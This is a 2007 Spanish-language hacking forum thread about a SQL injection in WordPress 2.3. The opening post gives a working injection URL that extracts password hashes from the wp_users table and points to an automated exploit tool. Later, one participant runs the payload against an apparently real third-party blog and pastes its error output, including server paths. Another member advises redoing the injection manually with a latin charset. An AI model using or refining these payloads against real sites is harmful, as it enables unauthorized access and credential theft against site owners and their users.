SQL inyeccion en todas las versiones de wordpress menos la ultima :p

Iniciado por WHK, 16 Diciembre 2007, 05:44 AM

0 Miembros y 2 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

WHK

16 Diciembre 2007, 05:44 AM Ultima modificación: 16 Diciembre 2007, 05:46 AM por WHK
Una vulnerabilidad de tipo Inyección SQL fue encontrada en wordpress sobre las versiones 2.3 y posteriores.

Localmente hice pruebas y la version 2.3.1 no es afectada, de todas formas es recomendable utilizar sistemas de protección adicionales como PHPIDS o filtros que impidan un query con inyecciones SQL.

Ejemplo:

    http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/  UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/    FROM/**/wp_users%23

Esto también puede complementarse con una noticia posterior donde puedes tener acceso como administrador con tan solo tener acceso de lectura a la base de datos:
http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/

Fuentes:
http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt
http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt
http://whk.h4ck1ng.net/2007-11.20/vulnerabilidad-en-la-autentificacion-de-cookies-dentro-de-wordpress/
http://seclists.org/bugtraq/2007/Dec/0127.html
http://trac.wordpress.org/ticket/2394
http://seclists.org/bugtraq/2007/Nov/0274.html
http://h4ck1ng.net/index.php/topic,1036.0.html
http://whk.h4ck1ng.net/2007-12.15/inyeccion-sql-en-wordpress-23-y-posteriores/

También está el pwnpress que hace todo el trabajo sucio automaticamente :P


http://www.info-pull.com/code.dynp

-sagitari-

#2
23 Diciembre 2007, 13:38 PM Ultima modificación: 23 Diciembre 2007, 14:15 PM por sirdarckcat
Cita de: hackpsycho en 16 Diciembre 2007, 21:49 PM
donde puedo descargar ese soft amigo?

No click&hack link re-"movido"

                                         

gasp

#3
27 Diciembre 2007, 05:28 AM
alguien sabe como puedo compilarlo ? en cke lo puedo compilar para cke salga en modo graffico como aparece en la imagen ?

consegui el code, pero esta en ruby ya lo compile pero nadamas no ckiere...


WHK

#4
27 Diciembre 2007, 07:35 AM
Necesitas una librería para poder ejecutarlo la cual no me acuerdo cual era, por eso me aburrí y lo borré :P

gasp

#5
27 Diciembre 2007, 09:06 AM
saludos, oie seria bueno cke recordaras esa libreria y asi poder buscarla, y poder compilar al cien ese  exploit o programa espero respuesta

aninhill

#6
30 Diciembre 2007, 04:09 AM
Lo probe en un blog de wordpress. No se que version es pero me responde esto:


Código [Seleccionar]

WordPress database error: [Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'like']
SELECT SQL_CALC_FOUND_ROWS wp_posts.* FROM wp_posts WHERE 1=1 AND (((post_title LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#') OR (post_content LIKE '�\')))/**/AND/**/ID=-1/**/ UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/ FROM/**/wp_users#'))) AND post_type = 'post' AND (post_status = 'publish') ORDER BY post_date DESC LIMIT 0, 10

Warning: Cannot modify header information - headers already sent by (output started at /home/jamiecar/public_html/wp-includes/wp-db.php:160) in /home/jamiecar/public_html/wp-includes/pluggable.php on line 391

sirdarckcat

#7
30 Diciembre 2007, 08:29 AM
tienes que hacer la inyeccion manualmente y cambiar el charset a latin.

Saludos!!
Imprimir
Ir Arriba Páginas1
Acciones del Usuario